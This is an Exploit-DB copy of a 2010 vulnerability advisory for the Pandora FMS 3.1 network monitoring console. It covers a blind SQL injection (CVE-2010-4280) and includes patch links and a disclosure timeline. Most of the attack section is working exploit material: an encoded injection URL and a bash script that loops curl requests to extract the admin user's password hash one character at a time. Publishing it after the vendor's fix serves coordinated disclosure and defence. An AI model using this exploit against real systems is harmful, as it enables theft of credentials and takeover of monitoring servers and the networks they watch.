Pandora Fms 3.1 – Blind SQL Injection

  • 作者: Juan Galiana Lara
    日期: 2010-11-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15642/
  • [+] Introduction
    
    Pandora FMS (for Pandora Flexible Monitoring System) is a software
    solution for monitoring computer networks. It allows monitoring in a
    visual way the status and performance of several parameters from
    different operating systems, servers, applications and hardware systems
    such as firewalls, proxies, databases, web servers or routers.
    
    It can be deployed in almost any operating system. It features remote
    monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use
    agents. An agent is available for each platform. It can also monitor
    hardware systems with a TCP/IP stack, such as load balancers, routers,
    network switches, printers or firewalls.
    
    This software has several servers that process and get information from
    different sources, using WMI for gathering remote Windows information, a
    predictive server, a plug-in server which makes complex user-defined
    network tests, an advanced export server to replicate data between
    different sites of Pandora FMS, a network discovery server, and an SNMP
    Trap console.
    
    Released under the terms of the GNU General Public License, Pandora FMS
    is free software.
    
    4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10
    
    The parameter group_id of operation/agentes/estado_agente.php is
    vulnerable to blind sql injection.
    
    
    PoC:
    http://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281
    
    
    Exploit:
    
    #!/bin/bash
    # Pandora Flexible Monitoring System Blind SQL Injection PoC
    # Juan Galiana Lara
    # Gets the md5 hash password from a specific user
    #
    #configure host,cookie&group_id before use it
    #usage
    #$ ./getpassword.sh
    #74b444ff2785ea8bb9ae02c13b6a71f1
    
    HOST="HOST"
    TARGET_USER="0x61646d696e" #admin
    PATTERN="Interval"
    COOKIE="rq842tci6e5ib7t918c6sv1ml4"
    CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v
    w x y z)
    GROUP_ID=2
    
    j=1
    while [[ $j -lt 33 ]]; do
    i=0
    while [[ $i -lt ${#CHARSET[ () ]} ]]; do
    c=$(printf '%d' "'${CHARSET[$i]}")
    
    URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281";;
    curl $URL --cookie "PHPSESSID=$COOKIE" 2> /dev/null | grep -q
    $PATTERN;
    if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;
    let i++
    done;
    if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo "Something went wrong!";
    exit 1; fi
    let j++;
    done
    echo
    exit 0
    
    
    The fix to these kind of issues was the implementation of a generic
    filter against sql injection. A proper fix is planned for a major version.
    
    
    [+] Impact
    
    An attacker can execute commands of the operating system, inject remote
    code in the context of the application, get arbitrary files from the
    filesystem or extract any data of the database including passwords and
    confidential information about the monitored network/systems. Also it is
    possible to bypass the authentication or scale privileges to became
    admin, gaining full control of the web application and web server. These
    vulnerabilities have a high impact to the confidentiality, integrity,
    and availability of the system.
    
    
    [+] Systems affected
    
    Versions prior and including 3.1 of Pandora FMS are affected
    
    
    [+] Solution
    
    Apply the security fix for version 3.1:
    http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
    
    
    Or upgrade to version 3.1.1 from
    http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/
    
    
    [+] Timeline
    
    Ago 2010: First contact to vendor
    Ago 2010: Confirmation of vendor
    Sept 2010: Second contact: SQL Injection vulnerabilities
    Sept 2010: Confirmation that the fix will be released on October
    Oct 2010: PandoraFMS security patch for 3.1 version released
    Oct 2010: Request for CVE numbers
    Nov 2010: PandoraFMS version 3.1.1 released
    Nov 2010: Disclosure of this advisory
    
    
    [+] References
    
    Official PandoraFMS site: http://pandorafms.org/
    SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/
    Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS
    Common Vulnerability Scoring System (CVSS) v2 calculator:
    http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2
    Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/
    
    
    [+] Credits
    
    These vulnerabilities has been discovered by Juan Galiana Lara -
    @jgaliana - http://juangaliana.blogspot.com/
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.4.10 (GNU/Linux)
    
    iQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy
    YbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s
    IVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9
    WIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4
    cC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP
    JPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP
    8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4
    7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH
    pARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5
    yNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4
    oBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF
    sn9vRJk4gc/PozOXDjC3
    =WmOh
    -----END PGP SIGNATURE-----